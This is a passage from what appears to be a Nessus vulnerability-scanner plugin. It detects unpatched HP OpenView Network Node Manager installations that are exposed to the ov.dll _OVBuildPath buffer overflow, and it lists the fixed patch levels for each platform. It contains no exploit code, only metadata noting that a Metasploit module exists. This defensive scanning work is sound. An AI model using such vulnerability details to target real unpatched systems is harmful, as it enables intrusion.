script_set_attribute(attribute:\"see_also\", value:\"https://www.securityfocus.com/archive/1/520349\");\n\n script_set_attribute(attribute:\"solution\", value:\"Upgrade to B.07.53 Patchlevel NNM_01213 or its equivalent.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'HP OpenView Network Node Manager ov.dll _OVBuildPath Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", 
value:\"2011/11/01\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/11/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/03/28\");\n\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:hp:openview_network_node_manager\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:hp:openview_network_node_manager\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Gain a shell remotely\");\n\n script_dependencies('hp_nnm_detect.nbin');\n script_require_keys('hp/hp_nnm');\n exit(0);\n}\n\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\n\n# Get the port number\nport = get_http_port(default:7510);\n\n# Get the version number and patch info\nversion = get_kb_item_or_exit('hp/hp_nnm/'+port+'/version');\nif (version !~ \"^[A-Z]+\\.[0-9]+\\.[0-9]+$\") exit(1, \"The version of Network Node Manager listening on port \"+port+\" is not recognized (\"+version+\").\");\nversion_split = split(version, sep:'.', keep:FALSE);\n\npatchlevel = get_kb_item('hp/hp_nnm/'+port+'/patchlevel');\n\n# Versions before B.07.53 are vulnerable, as are B.07.53 before NMM_01213\nif (\n version_split[0] == 'B' && \n int(version_split[1]) == 7 &&\n (\n int(version_split[2]) < 53 ||\n (int(version_split[2]) == 53 && (isnull(patchlevel) || patchlevel < 'NNM_01213'))\n )\n)\n{\n if (report_verbosity > 0)\n {\n report = '\\n Installed version : ' + version;\n if (!isnull(patchlevel)) report += ' ' + patchlevel + ' (or equivalent)';\n report += '\\n Fixed version : B.07.53 Windows => NNM_01213' +\n '\\n Solaris => PSOV_03535' +\n '\\n Linux RedHatAS2.1 => LXOV_00121' +\n '\\n Linux RedHat4AS-x86_64 => LXOV_00122' +\n '\\n HP-UX (IA) => PHSS_42233' +\n '\\n HP-UX (PA) => PHSS_42232' +\n 
'\\n';\n security_hole(port:port, extra:report);\n }\n else security_hole(port);\n exit(0);\n}\nelse \n{\n errmsg = \"The Network Node Manager \" + version + \" \";\n if (!isnull(patchlevel)) errmsg += patchlevel + \" (or equivalent) \";\n errmsg += \" install listening on port \"+port+\" is not affected.\";\n exit(0, errmsg);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}